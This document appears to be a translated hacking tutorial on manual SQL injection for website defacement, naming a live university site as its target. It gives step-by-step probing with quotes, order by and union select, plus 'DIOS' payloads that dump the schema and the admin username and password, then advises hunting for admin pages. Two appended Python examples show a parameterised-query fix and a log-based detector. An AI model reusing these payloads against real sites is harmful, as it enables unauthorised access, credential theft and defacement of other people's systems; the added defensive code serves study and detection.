Defacing with the Manual SQL Injection Method, with DIOS

Assalamualaikum wr. wb.
Here I am again.
This time I will give a tutorial on manual SQL injection.

Okay... follow along, hehe.

What you need
1. Internet, obviously; you can't do this without it
2. A dork *you can check the dorks here > Dork SQL injection
3. A website that is vulnerable to SQL injection
    *here I have a live target: http://dme.im.ufrj.br/visualizarNoticia.php?id=25
- Now we append a ' (single quote)
 so it becomes: http://dme.im.ufrj.br/visualizarNoticia.php?id=25'
- Here we get an error, or an image on the page goes missing.
- Then we run the +order+by+1--+ command
- Example: http://dme.im.ufrj.br/visualizarNoticia.php?id=25+order+by+1--+

- Keep increasing the order by number until an error appears again; here I got the error at 4.
- That means we only go up to 3, because the error is at 4.
- Next we run the +union+select+ command and add a - before the number
- So it becomes: http://dme.im.ufrj.br/visualizarNoticia.php?id=-25+union+select+1,2,3--+
- And here the "lottery numbers" appear, namely 1, 2 and 3.
- So that finding the database, tables and columns doesn't take long, we just use a DIOS
- Insert this DIOS at a lottery number
 DIOS:
 /*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/
- And the database, tables and columns come out right away.
 Note: If you don't know which is the database, which is the table and which is the column: the leftmost is the database, the middle one is the table, and the rightmost is the column.
- Next we just fetch the admin user / password.
- By inserting the following DIOS
DIOS:
 (/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namacolum,0x203a3a20,namacolum))))x)
- In other words, like this:
 http://dme.im.ufrj.br/visualizarNoticia.php?id=-25+union+select+1,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(usuario)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,strLogin,0x203a3a20,strSenha))))x),3--+
 *you have to adjust the table and column names to match.

- And now we have the admin user and password.
- Now you just need to find the admin page, which is usually at
 *  -/admin
     -/administrator
     -/login.php
     -/admin.php
- If you still haven't found it, you can download dirbuster here, or use an online admin finder.
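
Why the quote, order by and union select steps above behave as they do, and what stops them: this is an added example, not code from the original post, and it uses an in-memory SQLite table as a stand-in for the site's MySQL table. The table, column and function names are assumptions.

```python
import sqlite3

def make_db():
    """Constructed stand-in (SQLite) for the news table behind id=."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO news VALUES (25, 'Seminar', 'Room 101')")
    return db

def get_news_vulnerable(db, raw_id):
    # The request value is pasted into the SQL text, so it can add clauses.
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def get_news_hardened(db, raw_id):
    # Type check: this parameter is only ever a non-negative integer.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be an integer")
    # Bound parameter: the value is sent separately from the SQL text.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

def outcome(fn, db, raw_id):
    """What a visitor would observe for one request value."""
    try:
        return fn(db, raw_id)
    except sqlite3.Error:
        return "sql-error"   # the broken page seen after the quote / order by 4
    except ValueError:
        return "rejected"

# URL-decoded forms of the id values used in the steps above.
PROBES = ["25", "25'", "25 order by 3-- ", "25 order by 4-- ",
          "-25 union select 1,2,3-- "]

def compare():
    db = make_db()
    return {p: (outcome(get_news_vulnerable, db, p),
                outcome(get_news_hardened, db, p)) for p in PROBES}

if __name__ == "__main__":
    for probe, (vuln, hard) in compare().items():
        print(f"{probe!r:32} vulnerable={vuln!r} hardened={hard!r}")
```

With the hardened function every probe except the plain `25` is rejected before any SQL runs, so the error signal that the column count was read from is gone as well.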

Okay, that's probably enough for this tutorial; hopefully it was useful.
See you on the next tutorial...
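
The requests in this tutorial leave recognizable traces in a web server's access log. The following is an added detection example, not part of the original post: it decodes each query parameter, unwraps MySQL versioned comments such as `/*!50000select*/`, and flags the quote, order by, union select and information_schema patterns. The rule names, the log lines and the `/news.php` and `/search.php` paths are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
VERSIONED = re.compile(r"/\*!\d*")  # MySQL versioned comment opener, e.g. /*!50000
RULES = {
    "stray_quote": re.compile(r"^-?\d+\s*'"),
    "order_by_probe": re.compile(r"\border by \d+"),
    "union_select": re.compile(r"\bunion (?:all )?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\b"),
    "trailing_comment": re.compile(r"--$"),
}

def normalize(value):
    """Lowercase, unwrap /*!NNNNN ... */ and treat parentheses as spaces."""
    v = VERSIONED.sub(" ", value.lower()).replace("*/", " ")
    return re.sub(r"[\s()]+", " ", v).strip()

def match_rules(value):
    norm = normalize(value)
    hits = {name for name, rx in RULES.items() if rx.search(norm)}
    if VERSIONED.search(value):
        hits.add("versioned_comment")
    return sorted(hits)

def scan(log_lines):
    """Return (line_number, parameter, rules) for each suspicious parameter."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qsl percent-decodes and turns '+' into a space.
        for name, value in parse_qsl(query, keep_blank_values=True):
            rules = match_rules(value)
            if rules:
                findings.append((n, name, rules))
    return findings

# Constructed sample lines in combined log format.
SAMPLE = """
198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] "GET /news.php?id=25 HTTP/1.1" 200 5120
203.0.113.7 - - [01/Jan/2024:10:01:10 +0000] "GET /news.php?id=25' HTTP/1.1" 200 312
203.0.113.7 - - [01/Jan/2024:10:01:40 +0000] "GET /news.php?id=25+order+by+4--+ HTTP/1.1" 200 312
203.0.113.7 - - [01/Jan/2024:10:02:05 +0000] "GET /news.php?id=-25+union+select+1,2,3--+ HTTP/1.1" 200 4980
203.0.113.7 - - [01/Jan/2024:10:02:30 +0000] "GET /news.php?id=-25+union+select+1,(/*!50000select*/(1)from(information_schema.columns)),3--+ HTTP/1.1" 200 9120
198.51.100.9 - - [01/Jan/2024:10:03:00 +0000] "GET /search.php?q=trade+union+news HTTP/1.1" 200 2048
""".strip().splitlines()
```

`scan(SAMPLE)` flags lines 2 to 5 and leaves the two ordinary requests alone, including the search for "trade union news".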
